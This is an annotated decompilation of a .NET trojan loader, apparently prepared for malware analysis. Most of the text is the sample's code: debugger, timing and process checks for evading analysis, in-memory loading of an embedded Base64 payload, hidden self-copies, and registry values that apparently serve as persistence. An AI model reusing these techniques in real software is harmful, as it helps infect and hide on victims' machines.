// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
//
// Analyst notes (added during review; the code below is unchanged decompiler output):
// - Identifiers are obfuscated to control characters, and the name \u0002 is reused for this
//   class, one field and several method overloads, so call sites must be read by argument list.
// - Every string is produced at run time by \u0008.\u0002(int), a decoder type that is not
//   part of this listing. Registry paths, value names, process names, resource names and file
//   names are therefore unknown here; the comments describe only the API calls that are visible.
// - Visible behaviour: a set of flag-gated environment checks that make the program exit early,
//   a Base64 payload read from an embedded resource and run in-process via Assembly.Load,
//   flag-gated registry writes, and a self-copy into two directories followed by registry
//   string values that hold the path of the copy.
// - Almost every step is wrapped in an empty catch, so failures leave no error output.

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;

internal sealed class \u0002
{
  // Instance of type \u0003 (not in this listing). Only used by the last fallback in \u0003().
  private static \u0003 \u0002 = new \u0003();
  // Two strings decoded from the same key; the entry method exits unless they compare equal.
  // Purpose not determinable from this listing - TODO confirm.
  private static string \u0003 = \u0008.\u0002(-665676900);
  private static string \u0005 = \u0008.\u0002(-665676900);
  // Seven constant bytes. This field is not read anywhere in this listing.
  // NOTE(review): it shares its name with the decoder type \u0008; the \u0008.\u0002(int)
  // calls are presumed to target that type, not this array - confirm in the IL.
  private static byte[] \u0008 = new byte[7] { (byte) 98, (byte) 87, (byte) 76, (byte) 65, (byte) 54, (byte) 43, (byte) 32 };
  // Payload bytes: assigned from the Base64-decoded embedded resource, consumed by \u0003().
  private static byte[] \u0006;
  // --- Behaviour flags. The values below are the ones compiled into this sample. ---
  // Gate: exit if Debugger.IsAttached.
  private static bool \u000E = false;
  // Gate: exit if a 10 ms sleep does not advance the clock as expected.
  private static bool \u000F = false;
  // Gate: exit if the process named by decoded string -665677682 is running (enabled).
  private static bool \u0002\u2000 = true;
  // Gate: invisible-window title check.
  private static bool \u0003\u2000 = false;
  // Gates: exit if the process named by the matching decoded string is running.
  private static bool \u0005\u2000 = false;
  private static bool \u0008\u2000 = false;
  private static bool \u0006\u2000 = false;
  // Enabled in this sample (decoded string -665677579).
  private static bool \u000E\u2000 = true;
  private static bool \u000F\u2000 = false;
  private static bool \u0002\u2001 = false;
  // The next five flags are not read anywhere in this listing.
  private static bool \u0003\u2001 = true;
  private static bool \u0005\u2001 = false;
  private static bool \u0008\u2001 = false;
  private static bool \u0006\u2001 = false;
  private static bool \u000E\u2001 = false;
  // Gate: show a message box on a separate thread, using the two strings below.
  private static bool \u000F\u2001 = false;
  // Message box text (\u0002\u2002) and caption (\u0003\u2002), as passed to MessageBox.Show.
  private static string \u0002\u2002 = \u0008.\u0002(-665676875);
  private static string \u0003\u2002 = \u0008.\u0002(-665676839);
  // Gate: block of DWord registry writes; also gates one extra write in the self-copy block.
  private static bool \u0005\u2002 = false;
  // Sub-gates inside the \u0005\u2002 block (registry writes and one hidden process launch).
  private static bool \u0008\u2002 = false;
  private static bool \u0006\u2002 = false;
  private static bool \u000E\u2002 = false;
  private static bool \u000F\u2002 = false;
  // Gate: self-copy plus registry string values pointing at the copy (enabled).
  private static bool \u0002\u2003 = true;
  // File name used for both copies of the executable.
  private static string \u0003\u2003 = \u0008.\u0002(-665676861);
  // Gate: write a text file next to the copy and execute it.
  private static bool \u0005\u2003 = false;
  // Gate and length (seconds) of a start-up delay.
  private static bool \u0008\u2003 = false;
  private static int \u0006\u2003 = 0;
  // Cached delegate for the message-box thread.
  private static ThreadStart \u000E\u2003;

  // Returns true when at least one running process has the given name.
  private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;

  // Shows a modal message box (OK button, "Hand" icon) with the given text and caption.
  private static void \u0002(string _param0, string _param1)
  {
    int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
  }

  // Writes one decoded string to the console. It is called between almost every step below;
  // the purpose is not evident from this listing (possibly obfuscator filler) - TODO confirm.
  private static void \u0002() => Console.Write(\u0008.\u0002(-665677671));

  // Presumably the program entry point (static, takes string[]) - confirm in assembly metadata.
  // Runs the flag-gated checks, starts the payload thread, then performs the flag-gated
  // registry and file-system changes. The argument is never read.
  private static void \u0002(string[] _param0)
  {
    // Exit unless the two decoded strings match.
    if (!(\u0002.\u0003 == \u0002.\u0005))
      return;
    \u0002.\u0002();
    // Optional message box, shown from its own thread so it does not block the rest.
    if (\u0002.\u000F\u2001)
    {
      try
      {
        if (\u0002.\u000E\u2003 == null)
          \u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
        new Thread(\u0002.\u000E\u2003).Start();
      }
      catch
      {
      }
    }
    \u0002.\u0002();
    // --- Environment checks: each one returns (ends the program) when it fires. ---
    // Managed debugger attached.
    if (\u0002.\u000E)
    {
      try
      {
        if (Debugger.IsAttached)
          return;
      }
      catch
      {
      }
    }
    // Timing check: exits if a 10 ms sleep advanced the clock by fewer than 10 ticks
    // (a tick is 100 ns), i.e. the sleep was skipped or the clock is being manipulated.
    if (\u0002.\u000F)
    {
      try
      {
        long ticks = DateTime.Now.Ticks;
        Thread.Sleep(10);
        if (DateTime.Now.Ticks - ticks < 10L)
          return;
      }
      catch
      {
      }
    }
    // Running-process check. The process name is encrypted; which tool it targets cannot
    // be told from this listing.
    if (\u0002.\u0002\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677682)))
          return;
      }
      catch
      {
      }
    }
    // Creates an invisible window, sets its title to one decoded string and exits if the
    // title then reads back equal to a different decoded string. Presumably detects an
    // environment that rewrites window titles - TODO confirm once both strings are decoded.
    if (\u0002.\u0003\u2000)
    {
      try
      {
        Form form = new Form();
        form.Text = \u0008.\u0002(-665677636);
        form.Opacity = 0.0;
        form.ShowInTaskbar = false;
        form.Show();
        if (form.Text == \u0008.\u0002(-665677647))
          return;
        form.Close();
      }
      catch
      {
      }
    }
    // Six more running-process checks, one decoded process name each.
    if (\u0002.\u0005\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677662)))
          return;
      }
      catch
      {
      }
    }
    if (\u0002.\u0008\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677616)))
          return;
      }
      catch
      {
      }
    }
    if (\u0002.\u0006\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677626)))
          return;
      }
      catch
      {
      }
    }
    if (\u0002.\u000E\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677579)))
          return;
      }
      catch
      {
      }
    }
    if (\u0002.\u000F\u2000)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677586)))
          return;
      }
      catch
      {
      }
    }
    if (\u0002.\u0002\u2001)
    {
      try
      {
        if (\u0002.\u0002(\u0008.\u0002(-665677795)))
          return;
      }
      catch
      {
      }
    }
    \u0002.\u0002();
    // Optional start-up delay of \u0006\u2003 seconds.
    if (\u0002.\u0008\u2003)
    {
      try
      {
        Thread.Sleep(\u0002.\u0006\u2003 * 1000);
      }
      catch
      {
      }
    }
    \u0002.\u0002();
    // --- Payload staging ---
    // Reads an embedded manifest resource as text, Base64-decodes it into \u0006 and starts
    // a thread on \u0003(), which loads those bytes as an assembly. The payload is not written
    // to disk by this code, so the observable is an assembly load with no backing file.
    try
    {
      Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805));
      \u0002.\u0002();
      StreamReader streamReader = new StreamReader(manifestResourceStream);
      string end = streamReader.ReadToEnd();
      \u0002.\u0002();
      streamReader.Close();
      \u0002.\u0006 = Convert.FromBase64String(end);
      try
      {
        \u0002.\u0002();
        Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
        \u0002.\u0002();
        thread.Start();
        \u0002.\u0002();
      }
      catch
      {
      }
    }
    catch
    {
    }
    \u0002.\u0002();
    // --- Flag-gated registry writes (disabled in this sample) ---
    // All values are written with RegistryValueKind.DWord from decoded strings. Key and value
    // names are encrypted, so which settings they change cannot be stated from this listing.
    if (\u0002.\u0005\u2002)
    {
      // HKCU write into an existing key (opened writable; a missing key fails into the catch).
      try
      {
        Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
      }
      catch
      {
      }
      // Creates the HKCU key if absent, writes the value there, then writes the same value
      // under the same path in HKLM. The HKLM key is not created here; any failure on that
      // write is swallowed by the catch.
      try
      {
        if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
        {
          Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
          Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
        }
        else
          Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
        Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
      }
      catch
      {
      }
      // Unlike its neighbours this block has no try/catch: a registry exception here
      // propagates out of the method and skips everything after it.
      if (\u0002.\u0008\u2002)
      {
        if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null)
        {
          Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354));
          Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
        }
        else
          Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
      }
      // Launches a decoded program with decoded arguments, without a window and without
      // the shell. Both strings are encrypted in this listing.
      if (\u0002.\u0006\u2002)
      {
        try
        {
          new Process()
          {
            StartInfo = {
              FileName = \u0008.\u0002(-665677560),
              Arguments = \u0008.\u0002(-665677508),
              UseShellExecute = false,
              CreateNoWindow = true
            }
          }.Start();
        }
        catch
        {
        }
      }
      // Two further DWord values under the same HKCU key as above (-665677722).
      if (\u0002.\u000E\u2002)
      {
        try
        {
          if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
          {
            Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
          }
          else
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
        }
        catch
        {
        }
      }
      if (\u0002.\u000F\u2002)
      {
        try
        {
          if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
          {
            Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
          }
          else
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
        }
        catch
        {
        }
      }
    }
    \u0002.\u0002();
    // --- Self-copy and registry string values (enabled in this sample) ---
    // Host artefacts to look for: two hidden copies of the executable (one under the
    // ApplicationData folder, one under a directory taken from an environment variable) and
    // registry string values under HKCU and HKLM that hold the path of a copy. This is
    // consistent with start-up persistence, but the key names are encrypted - confirm after
    // decoding -665677131 and -665677119.
    if (\u0002.\u0002\u2003)
    {
      // One DWord value under the HKCU key that the \u0005\u2002 block also writes to.
      try
      {
        Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
      }
      catch
      {
      }
      // Reads the running executable into memory and writes it to both target paths
      // (FileMode.Create overwrites an existing file), then marks both copies Hidden.
      try
      {
        FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
        byte[] buffer = new byte[fileStream1.Length];
        fileStream1.Read(buffer, 0, buffer.Length);
        fileStream1.Close();
        FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
        fileStream2.Write(buffer, 0, buffer.Length);
        fileStream2.Close();
        fileStream2.Dispose();
        FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
        fileStream3.Write(buffer, 0, buffer.Length);
        fileStream3.Close();
        fileStream3.Dispose();
        File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
        File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
      }
      catch
      {
      }
      // Stores the path of the environment-variable copy as a registry value, first under
      // HKCU and then under the same path in HKLM. If the HKCU write throws, the HKLM write
      // is skipped because both share one try block.
      try
      {
        Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
        Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
      }
      catch
      {
      }
      // With \u0005\u2002 set, also stores the path of the ApplicationData copy under a third
      // HKCU key, creating that key when it does not exist.
      if (\u0002.\u0005\u2002)
      {
        try
        {
          if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null)
          {
            Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073));
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
          }
          else
            Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
        }
        catch
        {
        }
      }
    }
    \u0002.\u0002();
    // --- Optional follow-up file (disabled in this sample) ---
    if (!\u0002.\u0005\u2003)
      return;
    try
    {
      // Skipped when the program already runs from the environment-variable directory.
      if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176))))
        return;
      // Builds one line of text from three decoded fragments around the quoted original
      // command-line path and the quoted executable file name, writes it to a file in the
      // environment-variable directory and executes that file without a window.
      // NOTE(review): presumably a script acting on the original file - the decoded
      // fragments are needed to confirm what it does.
      string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247);
      TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198));
      textWriter.WriteLine(str);
      textWriter.Close();
      new Process()
      {
        StartInfo = {
          FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)),
          UseShellExecute = false,
          CreateNoWindow = true
        }
      }.Start();
    }
    catch
    {
    }
  }

  // Thread body that runs the staged payload in \u0006. It tries four invocation shapes in
  // turn; each later attempt runs only if the previous one threw. The first three reload
  // the bytes with Assembly.Load on every attempt.
  public static void \u0003()
  {
    // Attempt 1: entry point invoked on an instance, with one empty string[] argument.
    try
    {
      \u0002.\u0002();
      Assembly assembly = Assembly.Load(\u0002.\u0006);
      MethodInfo entryPoint = assembly.EntryPoint;
      \u0002.\u0002();
      entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
      {
        (object) new string[0]
      });
    }
    catch
    {
      // Attempt 2: same, but with an empty argument list.
      try
      {
        \u0002.\u0002();
        Assembly assembly = Assembly.Load(\u0002.\u0006);
        MethodInfo entryPoint = assembly.EntryPoint;
        \u0002.\u0002();
        entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
      }
      catch
      {
        // Attempt 3: static invocation with no target object and a null argument array.
        try
        {
          \u0002.\u0002();
          MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
          \u0002.\u0002();
          entryPoint.Invoke((object) null, (object[]) null);
        }
        catch
        {
          // Attempt 4: hands the raw bytes, an empty string and this program's own path to
          // a method on the \u0003 instance. That type is not in this listing, so what it
          // does with them cannot be determined here - review type \u0003.
          try
          {
            \u0002.\u0002();
            \u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
            \u0002.\u0002();
          }
          catch
          {
          }
        }
      }
    }
  }

  // Thread body for the optional message box: shows the configured text and caption.
  private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}